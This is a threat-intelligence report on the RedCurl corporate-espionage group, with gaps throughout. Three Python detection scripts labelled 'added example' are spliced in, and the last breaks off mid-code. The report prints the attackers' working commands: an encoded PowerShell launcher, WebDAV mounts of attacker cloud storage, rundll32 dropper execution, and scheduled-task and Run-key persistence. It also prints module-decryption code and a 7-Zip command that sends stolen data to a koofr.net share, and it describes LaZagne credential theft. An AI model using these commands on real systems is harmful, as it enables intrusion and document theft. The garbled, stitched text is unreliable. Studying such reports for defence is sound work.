REDCURL
The pentest you didn’t know about
group-ib.com
AUGUST 2020
© Group−IB, 2020
Restrictions
1. The report was written by Group-IB experts without any third-
party funding.
2. The report provides information on the tactics, tools, and
infrastructure of the previously unknown group RedCurl. The
report’s goal is to minimize the risk of the group committing
further illegal acts, suppress any such activity in a timely
manner, and raise awareness among readers. The report also
contains indicators of compromise that organizations and
specialists can use to check their networks for compromise,
as well as recommendations on how to protect against future
attacks. Technical details about threats are provided solely
for information security specialists so that they can familiarize
themselves with them, prevent similar incidents from occurring
in the future, and minimize potential damage. The technical
details about threats outlined in the report are not intended


3. The report is for information purposes only and is limited
in distribution. Readers are not authorized to use it for
commercial purposes and any other purposes not related
to education or personal non-commercial use. Group-IB grants
readers the right to use the report worldwide by downloading,

citation, provided that the report itself (including a link to the
copyright holder’s website on which it is published) is given
as the source of the quote.
4. The entire report is subject to copyright and protected
by applicable intellectual property law. It is prohibited to copy,
distribute (including by placing on websites), or use the
information or other content without the right owner’s prior
written consent.
If Group-IB’s copyright is violated, Group-IB will have the right
to approach a court or other state institution to protect its
rights and interests and seek punishment for the perpetrator
as provided by law, including recovery of damages.
Contents
Introduction 4
Channel1 aka RedCurl.C1 and Channel2 aka RedCurl.C2 26
Commands 26
RedCurl, CloudAtlas and RedOctober: campaign comparison 30
MITRE ATT&CK® Mapping (RedOctober/Cloud Atlas/Inception) 33
* The chapter is available in the full version only
Introduction
One summer evening in 2019, 
 received a call from a new customer
who said that their company had been attacked. They asked for
help in eliminating the incident’s aftermath and identifying the
hacker group responsible.
The duty CERT-GIB analyst examined the phishing email used
at the initial infection stage. It was particularly well-written, which
suggested that this was a planned targeted attack. The unique

in , a  module,
-
 team about the
incident and within a couple of hours the customer was informed
about the targeted attack against their business.
Meanwhile, the email sample and the attack details caught the
attention of Group-IB’s Threat Intelligence & Attribution spe-
cialists. The campaign conducted by the hacker group (unknown
at the time) involved unique tools written in PowerShell, which
is popular among IT specialists. Moreover, the emails targeted
-
nization as a whole. It became obvious that it was not an ordinary
cybercriminal group seeking to steal money. Group-IB specialists’

: namely that espionage- and
sabotage-oriented APT groups had come to play an increasingly
prominent role on the hacker scene. One such group was the one
in question: .
In each analyzed campaign, the group’s goal was to conduct espi-
onage. The attackers infected computers in targeted departments

group’s possible victims was an employee at a cybersecurity com-
pany that protects its customers against such attacks. Detected
incidents related to this threat group took place in various indus-
tries and had a wide geographical scope: from Russia to North
America. As such, it is likely that the attacks were ordered for the
purpose of corporate espionage. This hypothesis is reinforced
by the fact that the group acted as covertly as possible in order
to minimize the risk of being discovered on the victim’s network.
For instance, RedCurl did not use actively communicating Trojans
or remote administration tools with a graphical interface.
It should also be noted that RedCurl uses techniques similar
to those used by Red Teaming and penetration testing specialists.

A cyber espionage hacker group

is to conduct corporate espionage:
steal documents containing
commercially sensitive information


The group acted as covertly as possible
to minimize the risk of being discovered
on the victim’s network: RedCurl did
not use actively communicating Trojans
or remote administration tools

and infrastructure of RedCurl, a previously unknown group. In addi-

chain, which were prepared by specialists at 
, as well as unique data collected during incident
response operations related to campaigns attributed to RedCurl.
As part of their research, Group-IB’s digital forensics experts veri-
-
lar to those involved in the RedOctober and CloudAtlas campaigns,
whose goal is also espionage. An in-depth analysis based on the
MITRE ATT&CK® matrix did not reveal unambiguous links between
these campaigns, however.
Indicators of compromise are given at the end of the report

of RedCurl’s victims. YARA and Suricata rules, however, are only
available to customers.
Traditionally, the report features recommendations from
Group-IB experts on preventive measures to help protect against
the group’s attacks.
Key findings
 RedCurl (given by Group-IB)
 Corporate espionage and theft of documents
 2018 to present. Over more than two years, Group-IB has
detected 26 targeted attacks
 Russia, Ukraine, Canada, Germany, the United Kingdom, Norway
 

 The group is presumably Russian-speaking
 RedCurl created a set of PowerShell programs that can cumula-
tively be called a framework and that includes:
Droppers (including an initial dropper, InitialDropper)
Key module FirstStageAgent (aka FSA)
Two submodules called Channel1 (aka FSA.C1)
and Channel2 (aka FSA.C2)
Figure 1. Trojan unpacking diagram
The Trojan receives commands from its operator through a cloud
in the form of BAT scripts, which are simply subprograms. A total

Figure. 2. Diagram of Trojan-operator interactions through the cloud


Minimal use of binary code.
Use of anti-detection techniques.
Control over an infected computer through commands kept
in a legitimate cloud storage. The commands are sent as Power-
Shell scripts.
Special scripts for displaying fake Outlook windows to intercept
the logins and passwords of targeted individuals.
The group usually remains in the victim’s network for two to six
months. The stage of spreading over the network is stretched
over a long time to remain unnoticed for as long as possible.
To achieve this, the group does not use any actively communi-
cating Trojans or remote-control tools via RDP.
 



RedCurl uses cloud services such as cloudme.com, koofr.net,
pcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com,
powerfolder.com, docs.live.net, syncwerk.cloud, cloud.woelkli.com,
and framagenda.org. To manage and access clouds, the threat
actors use the service multcloud.com.
Geographical scope and targets
All RedCurl attacks are targeted, i.e. emails and droppers are tai-


only malware modules were discovered (rather than the initial
dropper, which can reveal the target).


Construction companies
Retailers
Travel agencies
Insurance companies
Financial companies
Banks




Russia
Ukraine
Canada
Germany
The United Kingdom
Norway
that have become victims
of RedCurl’s espionage attacks, some on several occasions.
Group-IB specialists contacted each of them and provided recom-
mendations on further steps to eliminate the consequences of the
attacks. Names of victims are not disclosed. At the time of writing,
some of the companies continue to respond to the incidents.
Analysis of the customer’s compromised data revealed a set
of data relating to a team lead at a cybersecurity company. The
IP addresses that communicated with RedCurl’s cloud belong
to the company in question. It is impossible to determine whether
this data was compromised or whether this was an instance
of controlled analysis of the Trojan by researchers.
Figure 3. Timeline
of RedCurl attacks
Initial access
As is the case with many espionage campaigns, initial access
to targeted infrastructures in RedCurl attacks involves
spear-phishing emails. RedCurl’s distinctive feature, however,
is that the email content is carefully drafted. For instance, the
emails displayed the targeted company’s address and logo, while
the sender address featured the company’s domain name.
The attackers posed as members of the HR team at the targeted
organization and sent out emails to multiple employees at once,
which made the employees less vigilant, especially considering
that many of them worked in the same department.
To deliver the payload, RedCurl used archives, links to which
were placed in the email body. Despite the fact that the links
redirected to public cloud storage services, the way they were
disguised tricked users into thinking that they were visiting the

Figure 4. Example of a spear-phishing email sent by RedCurl

Were used by the group to get initial
access to targeted companies
Figure 5. Example of a spear-phishing email sent by RedCurl
Figure 6. Technical records of the domain mailsecure[.]tech
The phishing emails were sent using the domain name


name had been registered six months before the campaign was
launched, on December 6, 2018. On the day of the attack, the SOA

Naturally, the websites belonging to the targeted organizations
did not host the archive, which was stored in the cloud, most
often Dropbox. In addition to Dropbox, RedCurl’s campaigns also
involved free hosting services, especially Byethost and AttractSoft:
http://********.byethost22.com/3/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BE%20%D0%B5%D0%B6%D0%B5%D0%B3%D0%BE%D0%B4%D0%BD%D0%BE%D0%BC%20%D0%BF%D1%80%D0%B5%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B8%20%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2.7z
http://********.byethost7.com/dl/********.7z
http://logs99.atwebpages.com/********/reports/002838177363613567218367647/actual/report.php
http://mtpon34.myartsonline.com/report/2890000027835616636545613/actual/report.php



an attacker-controlled cloud storage was set up on the local
system as a network drive and launched , which
was hosted there, after which a phishing document was displayed
to the victim.
In the attacks observed in 2019, victims downloaded an archive



-

suspicions.
In RedCurl’s earlier campaigns carried out in 2018, the utility

to launch the module FirstStageAgent_light. In addition to the

resources necessary for displaying the contents correctly. When


Figure 7. Example
of a downloaded

extension made
invisible
Figure 8. MHT InitialDropper



on the victim’s computer
 was launched
using Windows PowerShell. In addition, the contents of the phish-
ing document or web page were displayed.
RedCurl.FirstStageAgent was distributed in a similar way, using
JavaScript. When it was launched, the victim was shown a legit-
imate web page that asked them to download, install, or re-in-

of RedCurl’s toolset can be found in the Tools section.
Figure 9. Types of Trojans in 2018, 2019, and 2020


Trojan execution and persistence in the system
The vast majority of tools used in RedCurl campaigns are Windows
PowerShell scripts. For instance, a PowerShell script was used
to launch RedCurl.Dropper and set up cloud storage as a network
drive. Below is one such example:
powershell.exe -enc "JgAgACIAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgAgAEAAKAAiAHMAZABtADUALgBkAGwAbAAsAG8AQgBTAGkAUQBTAFUASQBTAHIAUwB5AE4AYQBJAGEAagBQAHAAaQBWAFUAUQBCAE0AZwBBACIAKQA7ACAAbgBlAHQAIAB1AHMAZQAgAGgAdAB0AHAAcwA6AC8ALwBhAHAAcAAuAGsAbwBvAGYAcgAuAG4AZQB0AC8AZABhAHYAIABuADYAegByAHMAcwA5AGQAbwBxAG8AagA2AGkAdQAxACAALwB1AHMAZQByADoAZgBvAHkAdQBiAEAAdABoAGUAdABlAG0AcABtAGEAaQBsAC4AYwBvAG0AOwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAYQBwAHAALgBrAG8AbwBmAHIALgBuAGUAdABAAFMAUwBMAFwAZABhAHYAIAAvAEQARQBMAEUAVABFADsA"
Decoded, the script reads:
& "rundll32.exe" @("sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA");
net use https://app.koofr.net/dav PASSWORD
net use \\app.koofr.net@SSL\dav /DELETE;
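As an added example (not code from the report or from Group-IB), the following Python routine shows how an analyst can turn the -enc argument above back into script text and triage it: it decodes the UTF-16LE base64, pulls out the DLL and export handed to rundll32 and the WebDAV host mounted with net use, checks the host against the cloud providers the report lists, and redacts the mount credentials before the decoded line is shared. The encoded blob is the one printed above; the function names, the result format and the benign sample are this example's own.

```python
"""Decode and triage a `powershell.exe -enc` command line of the kind RedCurl
used to mount cloud WebDAV storage and launch RedCurl.Dropper via rundll32.
Added example for this write-up, not tooling from the report or Group-IB: the
encoded blob is the one printed in the report; every other name (functions,
result keys, the benign sample) is this example's own."""
import base64
import re
from urllib.parse import urlparse

# Blob exactly as printed in the report, joined into one string.
REPORT_BLOB = (
    "JgAgACIAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgAgAEAAKAAiAHMAZABtAD"
    "UALgBkAGwAbAAsAG8AQgBTAGkAUQBTAFUASQBTAHIAUwB5AE4AYQBJAGEAagBQA"
    "HAAaQBWAFUAUQBCAE0AZwBBACIAKQA7ACAAbgBlAHQAIAB1AHMAZQAgAGgAdAB0"
    "AHAAcwA6AC8ALwBhAHAAcAAuAGsAbwBvAGYAcgAuAG4AZQB0AC8AZABhAHYAIAB"
    "uADYAegByAHMAcwA5AGQAbwBxAG8AagA2AGkAdQAxACAALwB1AHMAZQByADoAZg"
    "BvAHkAdQBiAEAAdABoAGUAdABlAG0AcABtAGEAaQBsAC4AYwBvAG0AOwAgAG4AZ"
    "QB0ACAAdQBzAGUAIABcAFwAYQBwAHAALgBrAG8AbwBmAHIALgBuAGUAdABAAFMA"
    "UwBMAFwAZABhAHYAIAAvAEQARQBMAEUAVABFADsA"
)

# Cloud providers the report lists as RedCurl's command/exfiltration storage.
REDCURL_CLOUD_DOMAINS = (
    "cloudme.com", "koofr.net", "pcloud.com", "idata.uz", "drivehq.com",
    "driveonweb.de", "opendrive.com", "powerfolder.com", "docs.live.net",
    "syncwerk.cloud", "cloud.woelkli.com", "framagenda.org",
)

# rundll32 <dll>,<export>  (PowerShell form: & "rundll32.exe" @("x.dll,Export"))
RUNDLL32_RE = re.compile(r"rundll32(?:\.exe)?\W*?([\w.\-]+\.dll)\s*,\s*(\w+)", re.I)
# net use <target>  where target is an https:// URL or a \\host@SSL\share UNC path
NET_USE_RE = re.compile(r"net\s+use\s+([^\s;]+)", re.I)
# net use <target> <password> /user:<login>
CRED_RE = re.compile(r"(net\s+use\s+[^\s;]+\s+)([^\s;/][^\s;]*)(\s+/user:)([^\s;]+)", re.I)


def decode_encoded_command(blob: str) -> str:
    """-enc / -EncodedCommand carries base64 of the UTF-16LE script text."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build a benign sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def host_of(target: str) -> str:
    """Host part of a `net use` target (URL or UNC path), lower-cased."""
    if target.lower().startswith(("http://", "https://")):
        return (urlparse(target).hostname or "").lower()
    host = target.lstrip("\\").split("\\", 1)[0]  # \\app.koofr.net@SSL\dav -> app.koofr.net@SSL
    return host.split("@", 1)[0].lower()           # drop the @SSL (WebDAV over TLS) marker


def redact_credentials(script: str) -> str:
    """Mask password and account in `net use <target> <pwd> /user:<login>` before sharing."""
    return CRED_RE.sub(r"\1<password>\3<user>", script)


def triage(script: str) -> dict:
    """Flag the dropper pattern: a DLL export run via rundll32 plus a WebDAV mount."""
    m = RUNDLL32_RE.search(script)
    hosts = sorted({host_of(t) for t in NET_USE_RE.findall(script) if host_of(t)})
    known = sorted({d for d in REDCURL_CLOUD_DOMAINS
                    for h in hosts if h == d or h.endswith("." + d)})
    return {
        "rundll32": (m.group(1), m.group(2)) if m else None,
        "webdav_hosts": hosts,
        "known_cloud_domains": known,
        # the script unmaps the share again once the DLL has been launched
        "unmaps_share": bool(re.search(r"net\s+use\b[^;]*/DELETE", script, re.I)),
        "suspicious": bool(m) and bool(hosts),
        "redacted": redact_credentials(script),
    }


def triage_encoded(blob: str) -> dict:
    return triage(decode_encoded_command(blob))


BENIGN_BLOB = encode_command('Get-Date; Write-Host "ok"')  # constructed benign sample

if __name__ == "__main__":
    for name, blob in (("report", REPORT_BLOB), ("benign", BENIGN_BLOB)):
        result = triage_encoded(blob)
        print(name, result["suspicious"], result["rundll32"], result["known_cloud_domains"])
        print("   ", result["redacted"])
```

The same decoder applies to any `-enc`/`-EncodedCommand` argument captured in process-creation telemetry; only the triage rules are specific to this dropper.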



opening stage. In such cases, a shortcut with a module launch
command is created in the Startup directory.
RedCurl.Dropper, which is a library, is launched using
rundll32.exe. RedCurl.FSA and the additional modules
RedCurl.FSA.C1 and RedCurl.FSA.C2, on the other hand,
are extracted from a CAB archive.
In earlier attacks that took place in 2018, the additional modules
Channel1 and Channel2 were downloaded from the cloud. In the
most recent attacks, the modules were located in the same CAB
archive as FirstStageAgent, while RedCurl.Dropper itself was
launched from a network drive set up during the initial access
stage.
These tools helped the attackers download additional PowerShell

goals) from cloud storage spaces and execute them. A detailed
description of the main and additional modules can be found in the
Tools section.
Persistence for both the main and additional modules was estab-
lished by creating scheduled tasks:
/c schtasks /Create /TN "LicenseAcquisitionService\EnableLicenseAcquisitionTask" /SC hourly /ST 02:26 /tr "wscript.exe /B \"C:\Users\admin\AppData\Roaming\Microsoft\EnableLicenseAcquisitionS\EnableLicenseAcquisitionF.vbs\"" /F
In earlier attacks, persistence was ensured also through the Run
keys in the Registry:
New-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run -Name MicrosoftCurrentUpdatesCheck -Value """$Channel1Dir\check.exe"" loop 65000 3600000 execmd ""cd ""$Channel1Dir"" && call check.bat""" -Force | Out-Null
The names of both scheduled tasks and Registry keys were

to distinguish them from legitimate operating system com-
ponents and applications: MicrosoftCurrentUpdatesCheck,
MDMMaintenenceTask, WindowsActionDialog, etc.
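As an added example (not Group-IB tooling), the Python script below hunts for the two persistence mechanisms just described in exported process command lines and Run-key values: a schtasks /Create whose action is wscript.exe /B on a .vbs under the user's AppData, and a Run value that starts a check.exe "loop <count> <ms> execmd ..." wrapper. The sample records are constructed from the command lines quoted above, with the $Channel1Dir placeholder and user paths filled in by this example, plus two benign look-alikes; the function names and result format are this example's own.

```python
"""Hunt for the RedCurl persistence pattern: schtasks /Create entries whose
action is "wscript.exe /B <script under AppData>" and Run-key values that
launch a check.exe "loop <count> <ms> execmd ..." wrapper.
Added example for this write-up, not Group-IB tooling. Records are
constructed: the first two tasks and the first Run value follow the command
lines quoted in the report (paths filled in here); the others are benign."""
import re

# (source, text): process command lines ("proc") and Run-key values ("run")
# in the form an EDR export or an autoruns dump might present them.
SAMPLES = [
    ("proc", r'C:\Windows\System32\cmd.exe /c schtasks /Create /TN "LicenseAcquisitionService\EnableLicenseAcquisitionTask" /SC hourly /ST 02:26 /tr "wscript.exe /B \"C:\Users\admin\AppData\Roaming\Microsoft\EnableLicenseAcquisitionS\EnableLicenseAcquisitionF.vbs\"" /F'),
    ("proc", r'C:\Windows\System32\cmd.exe /c schtasks /Create /TN "WsSwapAssessmentTask" /SC hourly /MO 4 /ST 00:20 /tr "wscript.exe /B \"C:\Users\John\AppData\Local\Microsoft\WsSwapAssessmentTaskF\WsSwapAssessmentTaskS.vbs\"" /F'),
    # constructed benign task: an updater installed under Program Files
    ("proc", r'schtasks /Create /TN "ExampleUpdater" /SC daily /ST 03:00 /tr "\"C:\Program Files\Example\updater.exe\" /quiet" /F'),
    ("run", r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftCurrentUpdatesCheck = "C:\Users\admin\AppData\Roaming\Channel1\check.exe" loop 65000 3600000 execmd "cd "C:\Users\admin\AppData\Roaming\Channel1" && call check.bat"'),
    # constructed benign Run value: a per-user application that lives in AppData
    ("run", r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

CREATE_RE = re.compile(r"schtasks(?:\.exe)?\s+/Create\b", re.I)
TN_RE = re.compile(r'/TN\s+"?([^"\s]+)"?', re.I)
TR_RE = re.compile(r'/tr\s+"((?:\\"|[^"])*)"', re.I)   # action, with \" escapes inside
SC_RE = re.compile(r"/SC\s+(\w+)", re.I)
SCRIPT_RE = re.compile(r'[A-Za-z]:\\[^"]+?\.(?:vbs|js|wsf)\b', re.I)
SILENT_WSCRIPT_RE = re.compile(r"\b[cw]script(?:\.exe)?\s+/B\b", re.I)
LOOP_RE = re.compile(r"\bloop\s+\d+\s+\d+\s+execmd\b", re.I)
APPDATA_RE = re.compile(r"\\AppData\\", re.I)


def analyze_task(cmdline: str):
    """Finding for a schtasks /Create command line, or None if it is not one."""
    if not CREATE_RE.search(cmdline):
        return None
    tr = TR_RE.search(cmdline)
    action = tr.group(1).replace('\\"', '"') if tr else ""
    script = SCRIPT_RE.search(action)
    silent = bool(SILENT_WSCRIPT_RE.search(action))
    in_appdata = bool(script and APPDATA_RE.search(script.group(0)))
    sc = SC_RE.search(cmdline)
    reasons = []
    if silent:
        reasons.append("action is wscript.exe /B (script host, no error windows)")
    if in_appdata:
        reasons.append("script lives under the user's AppData")
    if sc and sc.group(1).lower() == "hourly":
        reasons.append("hourly trigger, consistent with cloud-polling beacon")
    tn = TN_RE.search(cmdline)
    return {"kind": "task", "name": tn.group(1) if tn else "?", "action": action,
            "reasons": reasons, "suspicious": silent and in_appdata}


def analyze_run_value(entry: str):
    """Finding for a 'HKCU\\...\\Run\\<name> = <data>' line."""
    key, _, data = entry.partition(" = ")
    reasons = []
    if LOOP_RE.search(data):
        reasons.append("check.exe-style 'loop <count> <ms> execmd' wrapper")
    if APPDATA_RE.search(data) and re.search(r"\.bat\b", data, re.I):
        reasons.append("runs a batch file out of AppData")
    return {"kind": "run", "name": key.rsplit("\\", 1)[-1], "action": data,
            "reasons": reasons, "suspicious": bool(reasons)}


def hunt(records):
    """Run each record through the matching analyzer; return suspicious findings."""
    findings = []
    for source, text in records:
        f = analyze_task(text) if source == "proc" else analyze_run_value(text)
        if f and f["suspicious"]:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLES):
        print(f"[{f['kind']}] {f['name']}")
        for reason in f["reasons"]:
            print("   -", reason)
```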
Reconnaissance and lateral movement
Analysis of RedCurl campaigns revealed that the group remains
in the victim’s network for two to six months on average. The stage

as the group strives to remain unnoticed for as long as possi-
ble and does not use any active Trojans that could disclose its
presence.
By using Windows PowerShell scripts and legitimate cloud ser-
vices, RedCurl reduced detections of the tools they used
to the minimum. As part of incident response operations,
Group-IB specialists observed antivirus software being triggered
by RedCurl.Dropper, but this occurred only after the malware had
been in the system for several months.
The attackers also used Windows PowerShell scripts to collect
information about the compromised system as well as about local
and network drives:
The same scripts were also used to collect information about
email accounts that could later be used for a new round of phish-
ing campaigns.

RedCurl remains in the victim’s network
As part of its campaigns, RedCurl used from the
Sysinternals Suite to collect information about Active Directory:
In RedCurl campaigns, movement across the network was

in network drives.
Although this tool is intended for working with a graphical inter-
face, the  option makes it possible to launch it from the
command line and save a copy of the Active Directory database

Unlike many other espionage groups, RedCurl does not seek
to gain access to systems using the Remote Desktop Protocol
or similar. Instead, the group sticks to tools with a command line
interface using SSH for interactive access, for example.
By using a Windows PowerShell script, the attackers created LNK
shortcuts for , and 
on network drives and turned on the “hidden” attribute for the original

launch RedCurl.Dropper together with it.

were located on the network drive. Although this propagation method

security systems.

Used by RedCurl to substitute ,
,,,, and

launch RedCurl.Dropper

at Group-IB’s Digital Forensics Lab were able to determine that these


that normally does not contain such traces.
In addition to Windows PowerShell scripts, RedCurl’s arsenal
includes other tools. To harvest credentials, for instance, the attack-
ers use an increasingly popular tool called LaZagne, which helps

as those saved in the victim’s browser. This tool is written in Python
and is delivered to compromised hosts together with the Python
interpreter. To reduce the likelihood of LaZagne being detected, the
attackers used , which helped obfuscate its code.

The tool used by RedCurl to extract
passwords not only from memory but

in the victim’s browser
Moreover, a PowerShell script that displayed a phishing
pop-up Microsoft Outlook window to the victim was used to collect
authentication data.

checked for validity. This way, if a targeted organization did not
have multi-factor authentication in place, the attackers could gain
access to compromised users’ email accounts even if the required
data was not obtained through LaZagne.

used by RedCurl to reduce the likelihood
of RedCurl.Dropper being detected and
obfuscate its code
Data exfiltration
RedCurl focuses on compromising email. The attackers had


Apart from scripts, in some cases the hackers also used other


service.
The hackers searched both local drives and corporate network


Construction documentation
Legal action documents
Internal documents
Tools
The entire set of the group’s custom tools is written in PowerShell.
When these tools are in operation, third-party programs are
additionally downloaded, including ones written in Python.
RedCurl’s custom tools include:
RedCurl.InitialDropper
RedCurl.Dropper
RedCurl.FSA aka FirstStageAgent
RedCurl.FSA.C1 + RedCurl.FSA.C2
RedCurl.Commands
Figure 10. Diagram showing FSA with its modules and commands

The entire set of RedCurl’s custom
tools is written in PowerShell


or 7z archive with a PDF icon. This has not always been the case,
however. Analysis of historical data revealed:


LNK_Dropper, an MS Windows shortcut
Launching it will unpack a decoy document, a malicious DLL

shell script.
The user will be shown the decoy document while the system utility

cmd.exe command line interpreter and the extracted BAT script.


This will result in the launch of a PowerShell script that will set
up a cloud storage as a network drive using the system utility net.exe:
net use \\app.koofr.net@SSL\dav /DELETE;
net use https://app.koofr.net/dav PASSWORD
Next, the script will use the system utility rundll32.exe to launch the
dropper as the malicious library RedCurl.Dropper:
& "rundll32.exe" @("sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA");

When Dropper is launched, tasks are created, which ensures the
persistence of the key module RedCurl.FSA and the two “chan-
nels,” RedCurl.FSA.C1 and RedCurl.FSA.C2.
C:\Windows\System32\cmd.exe /c schtasks /Create /TN "WsSwapAssessmentTask" /SC hourly /MO 4 /ST 00:20 /tr "wscript.exe /B \"C:\Users\John\AppData\Local\Microsoft\WsSwapAssessmentTaskF\WsSwapAssessmentTaskS.vbs\"" /F
C:\Windows\System32\cmd.exe /c schtasks /Create /TN "IndexerAutomaticMaintenance\IndexerAutomaticMaintenanceTask" /SC hourly /ST 01:38 /tr "wscript.exe /B \"C:\Users\John\AppData\Roaming\IndexerAutomaticMaintenanceF\IndexerAutomaticMaintenance.vbs\"" /F
C:\Windows\System32\cmd.exe /c schtasks /Create /TN "LicenseAcquisitionService\EnableLicenseAcquisitionTask" /SC hourly /ST 02:13 /tr "wscript.exe /B \"C:\Users\John\AppData\Roaming\Microsoft\EnableLicenseAcquisitionS\EnableLicenseAcquisitionF.vbs\"" /F
The program then extracts and saves a CAB archive to the disk,
creates a new directory, and unpacks the contents of the CAB
archive into that directory.
The archive contains the , which has traditionally
been used to create and unpack archives. All command mod-
ules are encrypted using 7-Zip, which is also actively used
by RedCurl’s Trojan. The archive also contains a utility called curl,
which sends requests and ensures communication with the
C&C server.



FirstStageAgent is designed to perform the following functions:
1. Extract the modules RedCurl.Channel1 and RedCurl.Channel2.
2. Upload information about the infected machine.
3. Download and execute a new command (module).
The FSA key module connects to the cloud service to upload data
and obtain commands. The commands are sent as BAT scripts, the
body of which usually contains a PowerShell script or an encoded

Download of a module with commands

script (this step may be omitted)

Launch of the main part of the module
Along with the FSA key module, two auxiliary modules are installed:
FSA.Channel1 aka C1 and FSA.Channel2 aka C2. They act in the

to communicate with the cloud.
RedCurl uses cloud services such as cloudme.com, koofr.net,
pcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com,
powerfolder.com, and docs.live.net.
The modules RedCurl.Channel1 and RedCurl.Channel2 are stored
in password-protected archives. The key for the archives is con-

FirstStageAgent extracts the contents of the archives using the
“syspack.exe” utility. If the operation is successful, the

directory with the modules. Examples of commands for
extracting content from archives are presented below:
.\syspack.exe x -aoa -p${fPass} $Channel1_path -o${Channel1Dir};
.\syspack.exe x -aoa -p${fPass} $Channel2_path -o${Channel2Dir};
The program communicates with operators by reading and writ-

FirstStageAgent uses the WebDav technology, which allows for

cloud are performed using the . FirstStageAgent

to make requests to the cloud.
Figure 14. FSA operation algorithm
All downloads from and uploads to the cloud are carried out
using the curl utility. Prior to sending, data is encrypted using
the 7-Zip utility.
Before obtaining commands, FirstStageAgent logs
the start time. To do so, the program adds the user-
name as well as the current date and time to the end

on the cloud service. The message is formed by the command

actions, FirstStageAgent takes the following steps:
1. 
to the folder with the module.
2. Adds the username as well as the current time and date

3. 
from the cloud.
4. 

5. 
It is worth noting that modules are stored on the infected sys-
tem in encrypted form. The modules are encrypted using the
ConvertTo-SecureString function based on the AES algorithm.
A random sequence of bytes is used as a key. The decryption key
is always new for each attack and each module.
Figure 15. Diagram of Trojan-operator interactions through the cloud



object. The ConvertTo-SecureString method is used to decrypt the
module. The decryption key is located within the FirstStageAgent

each attack. Apart from encryption, the data is Base64-encoded.
Below is a code section responsible for decryption:
function Decrypt-CMD([BYTE[]] $key) {
    $path = ".\tempexec\cmd.txt";
    # Random 8-character name (digits and lowercase letters) for the decrypted module
    $cmdname = -join ((48..57) + (97..122) | Get-Random -Count 8 | % {[char]$_});
    # Stage 1: AES decryption via ConvertTo-SecureString with the per-attack key
    $dec = Get-Content $path | ConvertTo-SecureString -Key $key;
    $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($dec);
    $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr);
    [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr);
    # Stage 2: Base64 decoding of the plaintext, written out as a BAT file
    $bytes = [Convert]::FromBase64String($result);
    $bytes | Set-Content ".\tempexec\${cmdname}.bat" -Encoding Byte -Force;
    Start-Sleep 10;
    # The encrypted source file is removed once the module has been written
    Remove-Item .\tempexec\cmd.txt -Force;
    return $cmdname;
}

from which the FirstStageAgent module is launched. The module

decrypts it using the above algorithm (ConvertTo-SecureString
-> Base64). The decrypted module is written to the same direc-
tory. A random sequence of 8 characters is generated as a name




deleted using the  utility.
As such, all communications between the threat actor and the compromised infrastructure are carried out using legitimate cloud services.





The modules Channel1 and Channel2 have the same functions. Their main goal is to upload information about the infected device, then download and execute a new module with commands. The encryption method and the algorithm for receiving and sending
-
ent accounts to access the cloud storage.
-
municate with the cloud storage. Channel1 and FirstStageAgent use the “curl.exe” utility to interact with the cloud, while Channel2 mounts a network drive into the system. Mounting is carried out

located in the cloud are performed using console commands.
An example of a command used to mount a network drive is presented below:
net use https://storage.driveonweb.de/probdav $pass /user:$login /persistent:no;
Another feature that distinguishes Channel2 from Channel1 is the way of launching the decrypted module with commands. Channel2

exe”. The path to the module is passed as an argument. Once the script is run, a “WScript.Shell” object is created, which is then used
-
sented below:
On Error Resume Next
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Channel1 launches the decrypted module in the same way as FirstStageAgent.
The FirstStageAgent, Channel1, and Channel2 modules only download and execute commands (modules) in the “cmd.exe” command-line
-
mands that extend the Trojan’s functionality. This means that these Trojan commands are subprograms or modules.
Certain modules can execute PowerShell commands. In such cases,

Modules can contain commands to download additional software.

located in the cloud. Additional programs required for the Trojan to operate are located in the cloud directory. It is worth noting that


with commands use the same account. The same module can run

they are running to avoid restarting on the same machine. If the computer name matches one of the values on the list, the module will continue with the execution.
Each module starts by creating a temporary directory to save the result of its operation. The directory that stores a module that launched the command is used as a working directory. The directory
-
ules analyzed, the directory names are based on the following pat-

The output of each command is added to a password-protected archive. To create the archive, a console version of the 7-Zip program (syspack.exe) is used. The program is delivered to the infected device


they are removed from the system. The archive name is generated using the following template:
%computername%_%username%_%%CMD_NAME%%_[%random%]_[%DD%%MM%|%MM%%DD%]_%HH%%MM%.tmp
The month and day will be determined correctly only if the “DD.MM.YYYY” or “MM.DD.YYYY” date format is set in the system. The


used to create an archive is presented below:
syspack.exe a -p%packpass% -mhe=on -sdel -y \\app.koofr.net@SSL\dav\Koofr\STR\%ARCH_NAME% %LOG_FOLDER%
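The mount command, the hidden-window VBS launcher and the 7-Zip exfiltration call described above all leave distinctive process command lines, and the archive template gives the exfiltrated files a recognisable name. The following Python is an added example, not code from the report or from RedCurl, of detection logic a defender could run over process-creation telemetry: a handful of regular-expression rules derived from those command lines plus a parser for the archive template. The command lines it scans are constructed to mirror the report's description; the host names, user names, paths and passwords in them are invented, and the rule names are this example's own.

```python
"""Detection rules for the cloud-channel artefacts described in the report.
Added example; sample telemetry below is constructed, not real log data."""
import re

# Constructed process command lines modelled on the behaviours the report describes.
SAMPLE_EVENTS = [
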